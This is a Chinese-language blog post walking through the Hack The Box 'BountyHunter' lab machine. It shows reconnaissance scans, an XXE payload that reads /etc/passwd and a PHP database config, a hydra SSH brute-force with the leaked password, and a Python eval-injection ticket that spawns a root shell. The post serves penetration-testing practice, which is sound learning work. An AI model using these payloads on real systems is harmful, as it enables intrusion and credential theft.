

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="Crush">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>BountyHunter - Crush&#39;s Blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":160,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Crush's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="BountyHunter">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-10-18 14:00" pubdate>
        2021年10月18日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      522 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      7
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">BountyHunter</h1>
            
            <div class="markdown-body">
              <hr>
<pre><code>wp参考： https://blog.csdn.net/weixin_47156475/article/details/119672224
给的目标靶机10.10.11.100
</code></pre>
<h2 id=""><a href="#" class="headerlink" title=""></a><img src="https://i.loli.net/2021/10/18/dhRf8uF6OwqCzET.png" srcset="/img/loading.gif" lazyload alt="image.png"></h2><pre><code>nmap -sV -T4 -A 10.10.11.100  扫描结果
</code></pre>
<h2 id="-1"><a href="#-1" class="headerlink" title=""></a><img src="https://i.loli.net/2021/10/18/GKiBoweQNUbxIc9.png" srcset="/img/loading.gif" lazyload alt="image.png"></h2><pre><code>进网页看看，不是什么cms，
</code></pre>
<hr>
<pre><code>gobuster 扫描一下目录
</code></pre>
<h2 id="-2"><a href="#-2" class="headerlink" title=""></a><img src="https://i.loli.net/2021/10/18/6hcwvZiktBGUnJ9.png" srcset="/img/loading.gif" lazyload></h2><pre><code>nikto -h 10.10.11.100  发现3个php的文件
db.php这个在后面有大用
</code></pre>
<p><img src="https://i.loli.net/2021/10/18/ntYaGBHOep9ug7Q.png" srcset="/img/loading.gif" lazyload><br><img src="https://i.loli.net/2021/10/18/aJucf7CqNeyBrQj.png" srcset="/img/loading.gif" lazyload></p>
<hr>
<pre><code>readme.txt 也没有什么可用信息
</code></pre>
<h2 id="-3"><a href="#-3" class="headerlink" title=""></a><img src="https://i.loli.net/2021/10/18/ixFJ6eSXKWEV9bI.png" srcset="/img/loading.gif" lazyload></h2><pre><code>然后开始在网站到处点，看看有没有什么后台，找找上传

瞎几把点，点到一个这个玩意儿
</code></pre>
<h2 id="-4"><a href="#-4" class="headerlink" title=""></a><img src="https://i.loli.net/2021/10/18/HcoRwZ2F6tmvgaO.png" srcset="/img/loading.gif" lazyload></h2><pre><code>好像是提交参数的东西，抓包看下，
应该是base64 解密看下
</code></pre>
<h2 id="-5"><a href="#-5" class="headerlink" title=""></a><img src="https://i.loli.net/2021/10/18/3z1j8sJvInYaSrq.png" srcset="/img/loading.gif" lazyload alt="image.png"></h2><pre><code>应该是base64 解密看下
</code></pre>
<p><img src="https://i.loli.net/2021/10/18/1CzSY7X8yVZDIMr.png" srcset="/img/loading.gif" lazyload><br><img src="https://pic.imgdb.cn/item/616d11802ab3f51d919b0fb6.jpg" srcset="/img/loading.gif" lazyload></p>
<hr>
<pre><code>&lt;?xml  version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
    &lt;bugreport&gt;
    &lt;title&gt;a&lt;/title&gt;
    &lt;cwe&gt;b&lt;/cwe&gt;
    &lt;cvss&gt;c&lt;/cvss&gt;
    &lt;reward&gt;d&lt;/reward&gt;
    &lt;/bugreport&gt;
</code></pre>
<hr>
<pre><code>xml有点熟悉啊，思路好像清晰了，这个靶机应该考的xxe参考wp访问一下/etc/passwd
</code></pre>
<h2 id="-6"><a href="#-6" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d12bc2ab3f51d919c21ff.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>&lt;?xml  version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE data [ &lt;!ENTITY file SYSTEM &quot;file:///etc/passwd&quot;&gt;]&gt;
    &lt;bugreport&gt;
    &lt;title&gt;test&lt;/title&gt;
    &lt;cwe&gt;test&lt;/cwe&gt;
    &lt;cvss&gt;test&lt;/cvss&gt;
    &lt;reward&gt;&amp;file;&lt;/reward&gt;
    &lt;/bugreport&gt;
</code></pre>
<hr>
<pre><code>PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGRhdGEgWyA8IUVOVElUWSBmaWxlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIj5dPgoJCTxidWdyZXBvcnQ
</code></pre>
<hr>
<pre><code>解密结果
</code></pre>
<hr>
<pre><code>&lt;?php
// TODO -&gt; Implement login system with the database.
$dbserver = &quot;localhost&quot;;
$dbname = &quot;bounty&quot;;
$dbusername = &quot;admin&quot;;
$dbpassword = &quot;m19RoAU0hP41A1sTsq6K&quot;;
$testuser = &quot;test&quot;;
?&gt;
</code></pre>
<hr>
<pre><code>用这个账号密码尝试ssh登录
ssh admin@10.10.11.100
登录不上。。

用刚刚的保存的文件生成一个密码字典
cut -d : -f 1 passwd &gt;user
</code></pre>
<hr>
<pre><code>用九头蛇看能不能爆破进去
hydra -L user -p m19RoAU0hP41A1sTsq6K 10.10.11.100 ssh
</code></pre>
<h2 id="-7"><a href="#-7" class="headerlink" title=""></a><a target="_blank" rel="noopener" href="https://pic.imgdb.cn/item/616d12c72ab3f51d919c2be7"></a></h2><pre><code>爆破出来了
ssh development@10.10.11.100  m19RoAU0hP41A1sTsq6K
ssh连上了，普通权限
看wp的尝试提权
</code></pre>
<h2 id="-8"><a href="#-8" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d12cc2ab3f51d919c3080.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>ec598c30b683202dbda87c5b7b3e108c
</code></pre>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><hr>
<pre><code>sudo -l
看看是否有什么可以提取权限的方法，并且查看一下可以提权的文件
</code></pre>
<h2 id="-9"><a href="#-9" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d12d12ab3f51d919c34c0.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>一个py文件，应该就是用它来提权了，python还是有点拉，大概能看懂，写不出来
写一个.md文件，修改一个反弹shell
</code></pre>
<h2 id="-10"><a href="#-10" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d12d42ab3f51d919c37c6.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code># Skytrain Inc   
## Ticket to root  
__Ticket Code:__  
**102+ 10 == 112 and __import__(&#39;os&#39;).system(&#39;/bin/bash&#39;) == False 
</code></pre>
<h2 id="-11"><a href="#-11" class="headerlink" title=""></a><img src="https://pic.imgdb.cn/item/616d12db2ab3f51d919c3e73.jpg" srcset="/img/loading.gif" lazyload></h2><pre><code>1622fdb053418ba4935b17acccc77a12
</code></pre>
<p><img src="https://pic.imgdb.cn/item/616d12e22ab3f51d919c4602.jpg" srcset="/img/loading.gif" lazyload></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Hack-The-Box/">Hack The Box</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Hack-The-Box/">Hack The Box</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/10/18/Hach%20The%20Box-Previse/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Previse</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/11/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%96%B0%E6%89%8B%E7%9A%84%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">
                        <span class="hidden-mobile">记一次新手的内网渗透</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>














  
<script src="/js/diy/timeDate.js"></script>
<script src="//cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/metowolf/Metingjs@1.2/dist/Meting.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
